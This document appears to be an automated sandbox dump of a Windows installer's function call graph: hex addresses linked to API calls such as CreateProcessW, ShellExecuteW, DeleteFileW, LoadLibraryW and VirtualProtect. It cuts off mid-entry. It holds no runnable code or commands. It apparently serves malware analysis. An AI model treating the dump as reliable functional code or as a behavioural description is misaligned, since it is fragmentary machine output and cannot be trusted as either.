lstrcatW lstrcmpiW 4764 4036ae CreateDirectoryW SetCurrentDirectoryW 4757->4764 4757->4791 4758 40362d 4763 405a9b 18 API calls 4758->4763 4761 403785 4760->4761 4765 4062b2 3 API calls 4761->4765 4762->4757 4762->4758 4766 403639 4763->4766 4767 4036d1 4764->4767 4768 4036c6 4764->4768 4769 40378e 4765->4769 4766->4791 4891 405f48 lstrcpynW 4766->4891 4903 405f48 lstrcpynW 4767->4903 4902 405f48 lstrcpynW 4768->4902 4772 4062b2 3 API calls 4769->4772 4774 403797 4772->4774 4776 4037b5 4774->4776 4784 4037a5 GetCurrentProcess 4774->4784 4775 403648 4892 405f48 lstrcpynW 4775->4892 4780 4062b2 3 API calls 4776->4780 4778 405f6a 18 API calls 4781 403710 DeleteFileW 4778->4781 4836 40391f 4779->4836 4782 4037ec 4780->4782 4783 40371d CopyFileW 4781->4783 4793 4036df 4781->4793 4785 403801 ExitWindowsEx 4782->4785 4788 40380e 4782->4788 4783->4793 4784->4776 4785->4755 4785->4788 4786 403766 4789 405de2 40 API calls 4786->4789 4787 405de2 40 API calls 4787->4793 4790 40140b 2 API calls 4788->4790 4789->4791 4790->4755 4893 40382d 4791->4893 4792 405f6a 18 API calls 4792->4793 4793->4778 4793->4786 4793->4787 4793->4792 4795 403751 CloseHandle 4793->4795 4904 4056c3 CreateProcessW 4793->4904 4795->4793 4796->4725 4797->4727 4799 4061dc 5 API calls 4798->4799 4800 403332 4799->4800 4801 40333c 4800->4801 4802 405993 3 API calls 4800->4802 4801->4734 4803 403344 CreateDirectoryW 4802->4803 4907 405be3 4803->4907 4911 405bb4 GetFileAttributesW CreateFileW 4806->4911 4808 402dff 4835 402e0c 4808->4835 4912 405f48 lstrcpynW 4808->4912 4810 402e22 4811 4059df 2 API calls 4810->4811 4812 402e28 4811->4812 4913 405f48 lstrcpynW 4812->4913 4814 402e33 GetFileSize 4815 402f34 4814->4815 4833 402e4a 4814->4833 4816 402d1a 33 API calls 4815->4816 4817 402f3b 4816->4817 4819 402f77 GlobalAlloc 4817->4819 4817->4835 4915 40330f SetFilePointer 4817->4915 4818 4032f9 ReadFile 4818->4833 4821 402f8e 4819->4821 4820 402fcf 4822 402d1a 33 API calls 4820->4822 4825 405be3 2 API calls 4821->4825 4822->4835 4824 402f58 4826 4032f9 ReadFile 4824->4826 4828 402f9f CreateFileW 4825->4828 4829 402f63 4826->4829 4827 402d1a 33 API calls 4827->4833 4830 402fd9 4828->4830 4828->4835 4829->4819 4829->4835 4914 40330f SetFilePointer 4830->4914 4832 402fe7 4834 403062 46 API calls 4832->4834 4833->4815 4833->4818 4833->4820 4833->4827 4833->4835 4834->4835 4835->4742 4837 4062b2 3 API calls 4836->4837 4838 403933 4837->4838 4839 403939 4838->4839 4840 40394b 4838->4840 4925 405e8f wsprintfW 4839->4925 4841 405e15 3 API calls 4840->4841 4842 40397b 4841->4842 4844 40399a lstrcatW 4842->4844 4846 405e15 3 API calls 4842->4846 4845 403949 4844->4845 4916 403bf5 4845->4916 4846->4844 4849 405a9b 18 API calls 4850 4039cc 4849->4850 4851 403a60 4850->4851 4853 405e15 3 API calls 4850->4853 4852 405a9b 18 API calls 4851->4852 4854 403a66 4852->4854 4855 4039fe 4853->4855 4856 403a76 LoadImageW 4854->4856 4857 405f6a 18 API calls 4854->4857 4855->4851 4860 403a1f lstrlenW 4855->4860 4864 4059c0 CharNextW 4855->4864 4858 403b1c 4856->4858 4859 403a9d RegisterClassW 4856->4859 4857->4856 4863 40140b 2 API calls 4858->4863 4861 403ad3 SystemParametersInfoW CreateWindowExW 4859->4861 4862 403b26 4859->4862 4865 403a53 4860->4865 4866 403a2d lstrcmpiW 4860->4866 4861->4858 4862->4791 4867 403b22 4863->4867 4868 403a1c 4864->4868 4870 405993 3 API calls 4865->4870 4866->4865 4869 403a3d GetFileAttributesW 4866->4869 4867->4862 4872 403bf5 19 API calls 4867->4872 4868->4860 4871 403a49 4869->4871 4873 403a59 4870->4873 4871->4865 4874 4059df 2 API calls 4871->4874 4875 403b33 4872->4875 4926 405f48 lstrcpynW 4873->4926 4874->4865 4877 403bc2 4875->4877 4878 403b3f ShowWindow LoadLibraryW 4875->4878 4881 4052c5 5 API calls 4877->4881 4879 403b65 GetClassInfoW 4878->4879 4880 403b5e LoadLibraryW 4878->4880 4882 403b79 GetClassInfoW RegisterClassW 4879->4882 4883 403b8f DialogBoxParamW 4879->4883 4880->4879 4884 403bc8 4881->4884 4882->4883 4885 40140b 2 API calls 4883->4885 4886 403be4 4884->4886 4887 403bcc 4884->4887 4885->4862 4888 40140b 2 API calls 4886->4888 4887->4862 4889 40140b 2 API calls 4887->4889 4888->4862 4889->4862 4890->4732 4891->4775 4892->4779 4894 403848 4893->4894 4895 40383e CloseHandle 4893->4895 4896 403852 CloseHandle 4894->4896 4897 40385c 4894->4897 4895->4894 4896->4897 4928 40388a 4897->4928 4900 4057d0 71 API calls 4901 40366c OleUninitialize 4900->4901 4901->4752 4901->4753 4902->4767 4903->4793 4905 4056f2 CloseHandle 4904->4905 4906 4056fe 4904->4906 4905->4906 4906->4793 4908 405bf0 GetTickCount GetTempFileNameW 4907->4908 4909 405c26 4908->4909 4910 403358 4908->4910 4909->4908 4909->4910 4910->4734 4911->4808 4912->4810 4913->4814 4914->4832 4915->4824 4917 403c09 4916->4917 4927 405e8f wsprintfW 4917->4927 4919 403c7a 4920 405f6a 18 API calls 4919->4920 4921 403c86 SetWindowTextW 4920->4921 4922 403ca2 4921->4922 4923 4039aa 4921->4923 4922->4923 4924 405f6a 18 API calls 4922->4924 4923->4849 4924->4922 4925->4845 4926->4851 4927->4919 4929 403898 4928->4929 4930 40389d FreeLibrary GlobalFree 4929->4930 4931 403861 4929->4931 4930->4930 4930->4931 4931->4900 5092 40155b 5093 40296d 5092->5093 5096 405e8f wsprintfW 5093->5096 5095 402972 5096->5095 5097 4038dd 5098 4038e8 5097->5098 5099 4038ec 5098->5099 5100 4038ef GlobalAlloc 5098->5100 5100->5099 5101 40165e 5102 402b3a 18 API calls 5101->5102 5103 401665 5102->5103 5104 402b3a 18 API calls 5103->5104 5105 40166e 5104->5105 5106 402b3a 18 API calls 5105->5106 5107 401677 MoveFileW 5106->5107 5108 401683 5107->5108 5109 40168a 5107->5109 5111 401423 25 API calls 5108->5111 5110 40628b 2 API calls 5109->5110 5113 402197 5109->5113 5112 401699 5110->5112 5111->5113 5112->5113 5114 405de2 40 API calls 5112->5114 5114->5108 3946 4023e0 3957 402c44 3946->3957 3948 4023ea 3961 402b3a 3948->3961 3951 4023fe RegQueryValueExW 3952 40241e 3951->3952 3956 402424 RegCloseKey 3951->3956 3952->3956 3967 405e8f wsprintfW 3952->3967 3953 402793 3956->3953 3958 402b3a 18 API calls 3957->3958 3959 402c5d 3958->3959 3960 402c6b RegOpenKeyExW 3959->3960 3960->3948 3962 402b46 3961->3962 3968 405f6a 3962->3968 3965 4023f3 3965->3951 3965->3953 3967->3956 3984 405f77 3968->3984 3969 4061c2 3970 402b67 3969->3970 4002 405f48 lstrcpynW 3969->4002 3970->3965 3986 4061dc 3970->3986 3972 40602a GetVersion 3972->3984 3973 406190 lstrlenW 3973->3984 3974 405f6a 10 API calls 3974->3973 3978 4060a5 GetSystemDirectoryW 3978->3984 3979 4060b8 GetWindowsDirectoryW 3979->3984 3980 4061dc 5 API calls 3980->3984 3981 405f6a 10 API calls 3981->3984 3982 406131 lstrcatW 3982->3984 3983 4060ec SHGetSpecialFolderLocation 3983->3984 3985 406104 SHGetPathFromIDListW CoTaskMemFree 3983->3985 3984->3969 3984->3972 3984->3973 3984->3974 3984->3978 3984->3979 3984->3980 3984->3981 3984->3982 3984->3983 3995 405e15 RegOpenKeyExW 3984->3995 4000 405e8f wsprintfW 3984->4000 4001 405f48 lstrcpynW 3984->4001 3985->3984 3987 4061e9 3986->3987 3989 406252 CharNextW 3987->3989 3990 40625f 3987->3990 3993 40623e CharNextW 3987->3993 3994 40624d CharNextW 3987->3994 4003 4059c0 3987->4003 3988 406264 CharPrevW 3988->3990 3989->3987 3989->3990 3990->3988 3991 406285 3990->3991 3991->3965 3993->3987 3994->3989 3996 405e89 3995->3996 3997 405e49 RegQueryValueExW 3995->3997 3996->3984 3998 405e6a RegCloseKey 3997->3998 3998->3996 4000->3984 4001->3984 4002->3970 4004 4059c6 4003->4004 4005 4059dc 4004->4005 4006 4059cd CharNextW 4004->4006 4005->3987 4006->4004 5115 401ce5 GetDlgItem GetClientRect 5116 402b3a 18 API calls 5115->5116 5117 401d17 LoadImageW SendMessageW 5116->5117 5118 401d35 DeleteObject 5117->5118 5119 4029c7 5117->5119 5118->5119 5120 405166 5121 405176 5120->5121 5122 40518a 5120->5122 5124 4051d3 5121->5124 5125 40517c 5121->5125 5123 405192 IsWindowVisible 5122->5123 5131 4051a9 5122->5131 5123->5124 5126 40519f 5123->5126 5127 4051d8 CallWindowProcW 5124->5127 5128 4041e6 SendMessageW 5125->5128 5133 404abc SendMessageW 5126->5133 5130 405186 5127->5130 5128->5130 5131->5127 5138 404b3c 5131->5138 5134 404b1b SendMessageW 5133->5134 5135 404adf GetMessagePos ScreenToClient SendMessageW 5133->5135 5136 404b13 5134->5136 5135->5136 5137 404b18 5135->5137 5136->5131 5137->5134 5147 405f48 lstrcpynW 5138->5147 5140 404b4f 5148 405e8f wsprintfW 5140->5148 5142 404b59 5143 40140b 2 API calls 5142->5143 5144 404b62 5143->5144 5149 405f48 lstrcpynW 5144->5149 5146 404b69 5146->5124 5147->5140 5148->5142 5149->5146 5150 4042e8 lstrlenW 5151 404307 5150->5151 5152 404309 WideCharToMultiByte 5150->5152 5151->5152 5160 100018a9 5161 100018cc 5160->5161 5162 100018ff GlobalFree 5161->5162 5163 10001911 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5161->5163 5162->5163 5164 10001272 2 API calls 5163->5164 5165 10001a87 GlobalFree GlobalFree 5164->5165 4267 40206a 4268 402b3a 18 API calls 4267->4268 4269 402071 4268->4269 4270 402b3a 18 API calls 4269->4270 4271 40207b 4270->4271 4272 402b3a 18 API calls 4271->4272 4273 402084 4272->4273 4274 402b3a 18 API calls 4273->4274 4275 40208e 4274->4275 4276 402b3a 18 API calls 4275->4276 4277 402098 4276->4277 4278 4020ac CoCreateInstance 4277->4278 4279 402b3a 18 API calls 4277->4279 4282 4020cb 4278->4282 4279->4278 4281 402197 4282->4281 4283 401423 4282->4283 4284 4051f2 25 API calls 4283->4284 4285 401431 4284->4285 4285->4281 5166 40156b 5167 401584 5166->5167 5168 40157b ShowWindow 5166->5168 5169 401592 ShowWindow 5167->5169 5170 4029c7 5167->5170 5168->5167 5169->5170 5171 404b6e GetDlgItem GetDlgItem 5172 404bc0 7 API calls 5171->5172 5181 404dd9 5171->5181 5173 404c63 DeleteObject 5172->5173 5174 404c56 SendMessageW 5172->5174 5175 404c6c 5173->5175 5174->5173 5176 404ca3 5175->5176 5180 405f6a 18 API calls 5175->5180 5178 40419a 19 API calls 5176->5178 5177 404ebd 5179 404f69 5177->5179 5190 404f16 SendMessageW 5177->5190 5211 404dcc 5177->5211 5182 404cb7 5178->5182 5184 404f73 SendMessageW 5179->5184 5185 404f7b 5179->5185 5186 404c85 SendMessageW SendMessageW 5180->5186 5181->5177 5183 404e4a 5181->5183 5188 404abc 5 API calls 5181->5188 5189 40419a 19 API calls 5182->5189 5183->5177 5192 404eaf SendMessageW 5183->5192 5184->5185 5187 404fa4 5185->5187 5193 404f94 5185->5193 5194 404f8d ImageList_Destroy 5185->5194 5186->5175 5196 405113 5187->5196 5214 404b3c 4 API calls 5187->5214 5218 404fdf 5187->5218 5188->5183 5195 404cc5 5189->5195 5197 404f2b SendMessageW 5190->5197 5190->5211 5191 404201 8 API calls 5198 40515f 5191->5198 5192->5177 5193->5187 5199 404f9d GlobalFree 5193->5199 5194->5193 5200 404d9a GetWindowLongW SetWindowLongW 5195->5200 5208 404d15 SendMessageW 5195->5208 5210 404d94 5195->5210 5212 404d51 SendMessageW 5195->5212 5213 404d62 SendMessageW 5195->5213 5201 405125 ShowWindow GetDlgItem ShowWindow 5196->5201 5196->5211 5205 404f3e 5197->5205 5199->5187 5202 404db3 5200->5202 5201->5211 5203 404dd1 5202->5203 5204 404db9 ShowWindow 5202->5204 5223 4041cf SendMessageW 5203->5223 5222 4041cf SendMessageW 5204->5222 5209 404f4f SendMessageW 5205->5209 5208->5195 5209->5179 5210->5200 5210->5202 5211->5191 5212->5195 5213->5195 5214->5218 5215 4050e9 InvalidateRect 5215->5196 5216 4050ff 5215->5216 5224 4049d6 5216->5224 5217 40500d SendMessageW 5221 405023 5217->5221 5218->5217 5218->5221 5220 405097 SendMessageW SendMessageW 5220->5221 5221->5215 5221->5220 5222->5211 5223->5181 5225 4049f3 5224->5225 5226 405f6a 18 API calls 5225->5226 5227 404a28 5226->5227 5228 405f6a 18 API calls 5227->5228 5229 404a33 5228->5229 5230 405f6a 18 API calls 5229->5230 5231 404a64 lstrlenW wsprintfW SetDlgItemTextW 5230->5231 5231->5196 5232 4024ee 5233 4024f3 5232->5233 5234 40250c 5232->5234 5235 402b1d 18 API calls 5233->5235 5236 402512 5234->5236 5237 40253e 5234->5237 5242 4024fa 5235->5242 5238 402b3a 18 API calls 5236->5238 5239 402b3a 18 API calls 5237->5239 5240 402519 WideCharToMultiByte lstrlenA 5238->5240 5241 402545 lstrlenW 5239->5241 5240->5242 5241->5242 5243 402793 5242->5243 5244 402567 WriteFile 5242->5244 5244->5243 5245 4045ee 5246 404624 5245->5246 5247 4045fe 5245->5247 5249 404201 8 API calls 5246->5249 5248 40419a 19 API calls 5247->5248 5250 40460b SetDlgItemTextW 5248->5250 5251 404630 5249->5251 5250->5246 5252 4018ef 5253 401926 5252->5253 5254 402b3a 18 API calls 5253->5254 5255 40192b 5254->5255 5256 4057d0 71 API calls 5255->5256 5257 401934 5256->5257 5258 404970 5259 404980 5258->5259 5260 40499c 5258->5260 5269 405708 GetDlgItemTextW 5259->5269 5262 4049a2 SHGetPathFromIDListW 5260->5262 5263 4049cf 5260->5263 5265 4049b9 SendMessageW 5262->5265 5266 4049b2 5262->5266 5264 40498d SendMessageW 5264->5260 5265->5263 5267 40140b 2 API calls 5266->5267 5267->5265 5269->5264 5270 402770 5271 402b3a 18 API calls 5270->5271 5272 402777 FindFirstFileW 5271->5272 5273 40279f 5272->5273 5277 40278a 5272->5277 5274 4027a8 5273->5274 5278 405e8f wsprintfW 5273->5278 5279 405f48 lstrcpynW 5274->5279 5278->5274 5279->5277 5280 4014f1 SetForegroundWindow 5281 4029c7 5280->5281 5282 4018f2 5283 402b3a 18 API calls 5282->5283 5284 4018f9 5283->5284 5285 405724 MessageBoxIndirectW 5284->5285 5286 401902 5285->5286 4462 402573 4463 402b1d 18 API calls 4462->4463 4469 402582 4463->4469 4464 4026a0 4465 4025c8 ReadFile 4465->4464 4465->4469 4466 405c37 ReadFile 4466->4469 4467 4026a2 4474 405e8f wsprintfW 4467->4474 4468 402608 MultiByteToWideChar 4468->4469 4469->4464 4469->4465 4469->4466 4469->4467 4469->4468 4471 4026b3 4469->4471 4472 40262e SetFilePointer MultiByteToWideChar 4469->4472 4471->4464 4473 4026d4 SetFilePointer 4471->4473 4472->4469 4473->4464 4474->4464 5287 401df3 5288 402b3a 18 API calls 5287->5288 5289 401df9 5288->5289 5290 402b3a 18 API calls 5289->5290 5291 401e02 5290->5291 5292 402b3a 18 API calls 5291->5292 5293 401e0b 5292->5293 5294 402b3a 18 API calls 5293->5294 5295 401e14 5294->5295 5296 401423 25 API calls 5295->5296 5297 401e1b ShellExecuteW 5296->5297 5298 401e4c 5297->5298 5304 100016b6 5305 100016e5 5304->5305 5306 10001b18 22 API calls 5305->5306 5307 100016ec 5306->5307 5308 100016f3 5307->5308 5309 100016ff 5307->5309 5310 10001272 2 API calls 5308->5310 5311 10001726 5309->5311 5312 10001709 5309->5312 5315 100016fd 5310->5315 5313 10001750 5311->5313 5314 1000172c 5311->5314 5316 1000153d 3 API calls 5312->5316 5318 1000153d 3 API calls 5313->5318 5317 100015b4 3 API calls 5314->5317 5319 1000170e 5316->5319 5321 10001731 5317->5321 5318->5315 5320 100015b4 3 API calls 5319->5320 5322 10001714 5320->5322 5323 10001272 2 API calls 5321->5323 5324 10001272 2 API calls 5322->5324 5325 10001737 GlobalFree 5323->5325 5326 1000171a GlobalFree 5324->5326 5325->5315 5327 1000174b GlobalFree 5325->5327 5326->5315 5327->5315 5328 10002238 5329 10002296 5328->5329 5331 100022cc 5328->5331 5330 100022a8 GlobalAlloc 5329->5330 5329->5331 5330->5329 4693 4026f9 4694 402700 4693->4694 4697 402972 4693->4697 4695 402b1d 18 API calls 4694->4695 4696 40270b 4695->4696 4698 402712 SetFilePointer 4696->4698 4698->4697 4699 402722 4698->4699 4701 405e8f wsprintfW 4699->4701 4701->4697 5332 1000103d 5333 1000101b 5 API calls 5332->5333 5334 10001056 5333->5334 5335 402c7f 5336 402c91 SetTimer 5335->5336 5337 402caa 5335->5337 5336->5337 5338 402cf8 5337->5338 5339 402cfe MulDiv 5337->5339 5340 402cb8 wsprintfW SetWindowTextW SetDlgItemTextW 5339->5340 5340->5338 5342 4014ff 5343 401507 5342->5343 5345 40151a 5342->5345 5344 402b1d 18 API calls 5343->5344 5344->5345 5346 401000 5347 401037 BeginPaint GetClientRect 5346->5347 5348 40100c DefWindowProcW 5346->5348 5349 4010f3 5347->5349 5351 401179 5348->5351 5352 401073 CreateBrushIndirect FillRect DeleteObject 5349->5352 5353 4010fc 5349->5353 5352->5349 5354 401102 CreateFontIndirectW 5353->5354 5355 401167 EndPaint 5353->5355 5354->5355 5356 401112 6 API calls 5354->5356 5355->5351 5356->5355 5357 401a00 5358 402b3a 18 API calls 5357->5358 5359 401a09 ExpandEnvironmentStringsW 5358->5359 5360 401a1d 5359->5360 5362 401a30 5359->5362 5361 401a22 lstrcmpW 5360->5361 5360->5362 5361->5362 5363 401b01 5364 402b3a 18 API calls 5363->5364 5365 401b08 5364->5365 5366 402b1d 18 API calls 5365->5366 5367 401b11 wsprintfW 5366->5367 5368 4029c7 5367->5368 4264 100027c7 4265 10002817 4264->4265 4266 100027d7 VirtualProtect 4264->4266 4266->4265 5376 401f08 5377 402b3a 18 API calls 5376->5377 5378 401f0f GetFileVersionInfoSizeW 5377->5378 5379 401f36 GlobalAlloc 5378->5379 5380 401f8c 5378->5380 5379->5380 5381 401f4a GetFileVersionInfoW 5379->5381 5381->5380 5382 401f59 VerQueryValueW 5381->5382 5382->5380 5383 401f72 5382->5383 5387 405e8f wsprintfW 5383->5387 5385 401f7e 5388 405e8f wsprintfW 5385->5388 5387->5385 5388->5380 5389 401c8e 5390 402b1d 18 API calls 5389->5390 5391 401c94 IsWindow 5390->5391 5392 4019f0 5391->5392 5393 1000164f 5394 10001516 GlobalFree 5393->5394 5397 10001667 5394->5397 5395 100016ad GlobalFree 5396 10001682 5396->5395 5397->5395 5397->5396 5398 10001699 VirtualFree 5397->5398 5398->5395 5406 401491 5407 4051f2 25 API calls 5406->5407 5408 401498 5407->5408 4498 402295 4499 402b3a 18 API calls 4498->4499 4500 4022a4 4499->4500 4501 402b3a 18 API calls 4500->4501 4502 4022ad 4501->4502 4503 402b3a 18 API calls 4502->4503 4504 4022b7 GetPrivateProfileStringW 4503->4504 4510 401f98 4511 401faa 4510->4511 4521 40205c 4510->4521 4512 402b3a 18 API calls 4511->4512 4513 401fb1 4512->4513 4515 402b3a 18 API calls 4513->4515 4514 401423 25 API calls 4516 402197 4514->4516 4517 401fba 4515->4517 4518 401fd0 LoadLibraryExW 4517->4518 4519 401fc2 GetModuleHandleW 4517->4519 4520 401fe1 4518->4520 4518->4521 4519->4518 4519->4520 4533 40631e WideCharToMultiByte 4520->4533 4521->4514 4524 401ff2 4527 402011 4524->4527 4528 401ffa 4524->4528 4525 40202b 4526 4051f2 25 API calls 4525->4526 4529 402002 4526->4529 4536 10001759 4527->4536 4530 401423 25 API calls 4528->4530 4529->4516 4531 40204e FreeLibrary 4529->4531 4530->4529 4531->4516 4534 406348 GetProcAddress 4533->4534 4535 401fec 4533->4535 4534->4535 4535->4524 4535->4525 4537 10001789 4536->4537 4578 10001b18 4537->4578 4539 10001790 4540 100018a6 4539->4540 4541 100017a1 4539->4541 4542 100017a8 4539->4542 4540->4529 4627 10002286 4541->4627 4610 100022d0 4542->4610 4547 100017cd 4548 1000180c 4547->4548 4549 100017ee 4547->4549 4553 10001812 4548->4553 4554 1000184e 4548->4554 4640 100024a9 4549->4640 4551 100017be 4552 100017c4 4551->4552 4558 100017cf 4551->4558 4552->4547 4621 100028a4 4552->4621 4560 100015b4 3 API calls 4553->4560 4556 100024a9 10 API calls 4554->4556 4555 100017d7 4555->4547 4637 10002b5f 4555->4637 4562 10001840 4556->4562 4557 100017f4 4651 100015b4 4557->4651 4631 10002645 4558->4631 4565 10001828 4560->4565 4569 10001895 4562->4569 4662 1000246c 4562->4662 4568 100024a9 10 API calls 4565->4568 4567 100017d5 4567->4547 4568->4562 4569->4540 4573 1000189f GlobalFree 4569->4573 4573->4540 4575 10001881 4575->4569 4666 1000153d wsprintfW 4575->4666 4576 1000187a FreeLibrary 4576->4575 4669 1000121b GlobalAlloc 4578->4669 4580 10001b3c 4670 1000121b GlobalAlloc 4580->4670 4582 10001d7a GlobalFree GlobalFree GlobalFree 4583 10001d97 4582->4583 4594 10001de1 4582->4594 4585 100020ee 4583->4585 4583->4594 4595 10001dac 4583->4595 4584 10001b47 4584->4582 4586 10001c1d GlobalAlloc 4584->4586 4588 10001c86 GlobalFree 4584->4588 4591 10001c68 lstrcpyW 4584->4591 4592 10001c72 lstrcpyW 4584->4592 4584->4594 4599 10002048 4584->4599 4603 10001f37 GlobalFree 4584->4603 4606 1000122c 2 API calls 4584->4606 4608 10001cc4 4584->4608 4676 1000121b GlobalAlloc 4584->4676 4587 10002110 GetModuleHandleW 4585->4587 4585->4594 4586->4584 4589 10002121 LoadLibraryW 4587->4589 4590 10002136 4587->4590 4588->4584 4589->4590 4589->4594 4677 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4590->4677 4591->4592 4592->4584 4594->4539 4595->4594 4673 1000122c 4595->4673 4596 10002188 4596->4594 4598 10002195 lstrlenW 4596->4598 4678 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4598->4678 4599->4594 4602 10002090 lstrcpyW 4599->4602 4602->4594 4603->4584 4604 10002148 4604->4596 4609 10002172 GetProcAddress 4604->4609 4605 100021af 4605->4594 4606->4584 4608->4584 4671 1000158f GlobalSize GlobalAlloc 4608->4671 4609->4596 4612 100022e8 4610->4612 4611 1000122c GlobalAlloc lstrcpynW 4611->4612 4612->4611 4614 10002415 GlobalFree 4612->4614 4616 100023d3 lstrlenW 4612->4616 4617 100023ba GlobalAlloc 4612->4617 4618 1000238f GlobalAlloc WideCharToMultiByte 4612->4618 4680 100012ba 4612->4680 4614->4612 4615 100017ae 4614->4615 4615->4547 4615->4551 4615->4555 4616->4614 4619 100023d1 4616->4619 4617->4619 4618->4614 4619->4614 4684 100025d9 4619->4684 4623 100028b6 4621->4623 4622 1000295b EnumWindows 4624 10002979 4622->4624 4623->4622 4625 10002a75 4624->4625 4626 10002a6a GetLastError 4624->4626 4625->4547 4626->4625 4628 10002296 4627->4628 4630 100017a7 4627->4630 4629 100022a8 GlobalAlloc 4628->4629 4628->4630 4629->4628 4630->4542 4635 10002661 4631->4635 4632 100026b2 GlobalAlloc 4636 100026d4 4632->4636 4633 100026c5 4634 100026ca GlobalSize 4633->4634 4633->4636 4634->4636 4635->4632 4635->4633 4636->4567 4639 10002b6a 4637->4639 4638 10002baa GlobalFree 4639->4638 4687 1000121b GlobalAlloc 4640->4687 4642 10002530 StringFromGUID2 4645 100024b3 4642->4645 4643 10002541 lstrcpynW 4643->4645 4644 1000250b MultiByteToWideChar 4644->4645 4645->4642 4645->4643 4645->4644 4646 10002554 wsprintfW 4645->4646 4647 10002571 GlobalFree 4645->4647 4648 100025ac GlobalFree 4645->4648 4649 10001272 2 API calls 4645->4649 4688 100012e1 4645->4688 4646->4645 4647->4645 4648->4557 4649->4645 4692 1000121b GlobalAlloc 4651->4692 4653 100015ba 4654 100015c7 lstrcpyW 4653->4654 4656 100015e1 4653->4656 4657 100015fb 4654->4657 4656->4657 4658 100015e6 wsprintfW 4656->4658 4659 10001272 4657->4659 4658->4657 4660 100012b5 GlobalFree 4659->4660 4661 1000127b GlobalAlloc lstrcpynW 4659->4661 4660->4562 4661->4660 4663 10001861 4662->4663 4664 1000247a 4662->4664 4663->4575 4663->4576 4664->4663 4665 10002496 GlobalFree 4664->4665 4665->4664 4667 10001272 2 API calls 4666->4667 4668 1000155e 4667->4668 4668->4569 4669->4580 4670->4584 4672 100015ad 4671->4672 4672->4608 4679 1000121b GlobalAlloc 4673->4679 4675 1000123b lstrcpynW 4675->4594 4676->4584 4677->4604 4678->4605 4679->4675 4681 100012c1 4680->4681 4682 1000122c 2 API calls 4681->4682 4683 100012df 4682->4683 4683->4612 4685 100025e7 VirtualAlloc 4684->4685 4686 1000263d 4684->4686 4685->4686 4686->4619 4687->4645 4689 100012ea 4688->4689 4690 1000130c 4688->4690 4689->4690 4691 100012f0 lstrcpyW 4689->4691 4690->4645 4691->4690 4692->4653 5409 10001058 5411 10001074 5409->5411 5410 100010dd 5411->5410 5412 10001092 5411->5412 5413 10001516 GlobalFree 5411->5413 5414 10001516 GlobalFree 5412->5414 5413->5412 5415 100010a2 5414->5415 5416 100010b2 5415->5416 5417 100010a9 GlobalSize 5415->5417 5418 100010b6 GlobalAlloc 5416->5418 5419 100010c7 5416->5419 5417->5416 5420 1000153d 3 API calls 5418->5420 5421 100010d2 GlobalFree 5419->5421 5420->5419 5421->5410 5422 401718 5423 402b3a 18 API calls 5422->5423 5424 40171f SearchPathW 5423->5424 5425 40173a 5424->5425 4932 40159b 4933 402b3a 18 API calls 4932->4933 4934 4015a2 SetFileAttributesW 4933->4934 4935 4015b4 4934->4935 5426 40659d 5430 406421 5426->5430 5427 406d8c 5428 4064a2 GlobalFree 5429 4064ab GlobalAlloc 5428->5429 5429->5427 5429->5430 5430->5427 5430->5428 5430->5429 5430->5430 5431 406522 GlobalAlloc 5430->5431 5432 406519 GlobalFree 5430->5432 5431->5427 5431->5430 5432->5431 5433 40149e 5434 4014ac PostQuitMessage 5433->5434 5435 40223e 5433->5435 5434->5435 5436 4021a0 5437 402b3a 18 API calls 5436->5437 5438 4021a6 5437->5438 5439 402b3a 18 API calls 5438->5439 5440 4021af 5439->5440 5441 402b3a 18 API calls 5440->5441 5442 4021b8 5441->5442 5443 40628b 2 API calls 5442->5443 5444 4021c1 5443->5444 5445 4021d2 lstrlenW lstrlenW 5444->5445 5446 4021c5 5444->5446 5448 4051f2 25 API calls 5445->5448 5447 4051f2 25 API calls 5446->5447 5450 4021cd 5446->5450 5447->5450 5449 402210 SHFileOperationW 5448->5449 5449->5446 5449->5450 5451 100010e1 5460 10001111 5451->5460 5452 100011d8 GlobalFree 5453 100012ba 2 API calls 5453->5460 5454 100011d3 5454->5452 5455 10001164 GlobalAlloc 5455->5460 5456 100011f8 GlobalFree 5456->5460 5457 10001272 2 API calls 5458 100011c4 GlobalFree 5457->5458 5458->5460 5459 100012e1 lstrcpyW 5459->5460 5460->5452 5460->5453 5460->5454 5460->5455 5460->5456 5460->5457 5460->5458 5460->5459 5461 401b22 5462 401b73 5461->5462 5463 401b2f 5461->5463 5464 401b9d GlobalAlloc 5462->5464 5467 401b78 5462->5467 5468 401bb8 5463->5468 5469 401b46 5463->5469 5465 405f6a 18 API calls 5464->5465 5465->5468 5466 405f6a 18 API calls 5470 402238 5466->5470 5474 40223e 5467->5474 5482 405f48 lstrcpynW 5467->5482 5468->5466 5468->5474 5480 405f48 lstrcpynW 5469->5480 5476 405724 MessageBoxIndirectW 5470->5476 5473 401b8a GlobalFree 5473->5474 5475 401b55 5481 405f48 lstrcpynW 5475->5481 5476->5474 5478 401b64 5483 405f48 lstrcpynW 5478->5483 5480->5475 5481->5478 5482->5473 5483->5474 5484 4029a2 SendMessageW 5485 4029c7 5484->5485 5486 4029bc InvalidateRect 5484->5486 5486->5485 4110 401924 4111 401926 4110->4111 4112 402b3a 18 API calls 4111->4112 4113 40192b 4112->4113 4116 4057d0 4113->4116 4155 405a9b 4116->4155 4119 4057f8 DeleteFileW 4121 401934 4119->4121 4120 40580f 4122 40592f 4120->4122 4169 405f48 lstrcpynW 4120->4169 4122->4121 4199 40628b FindFirstFileW 4122->4199 4124 405835 4125 405848 4124->4125 4126 40583b lstrcatW 4124->4126 4170 4059df lstrlenW 4125->4170 4127 40584e 4126->4127 4130 40585e lstrcatW 4127->4130 4132 405869 lstrlenW FindFirstFileW 4127->4132 4130->4132 4132->4122 4140 40588b 4132->4140 4133 405958 4202 405993 lstrlenW CharPrevW 4133->4202 4136 405912 FindNextFileW 4136->4140 4141 405928 FindClose 4136->4141 4137 405788 5 API calls 4139 40596a 4137->4139 4142 405984 4139->4142 4143 40596e 4139->4143 4140->4136 4153 4058d3 4140->4153 4174 405f48 lstrcpynW 4140->4174 4141->4122 4145 4051f2 25 API calls 4142->4145 4143->4121 4146 4051f2 25 API calls 4143->4146 4145->4121 4148 40597b 4146->4148 4147 4057d0 64 API calls 4147->4153 4150 405de2 40 API calls 4148->4150 4149 4051f2 25 API calls 4149->4136 4151 405982 4150->4151 4151->4121 4153->4136 4153->4147 4153->4149 4175 405788 4153->4175 4183 4051f2 4153->4183 4194 405de2 4153->4194 4205 405f48 lstrcpynW 4155->4205 4157 405aac 4206 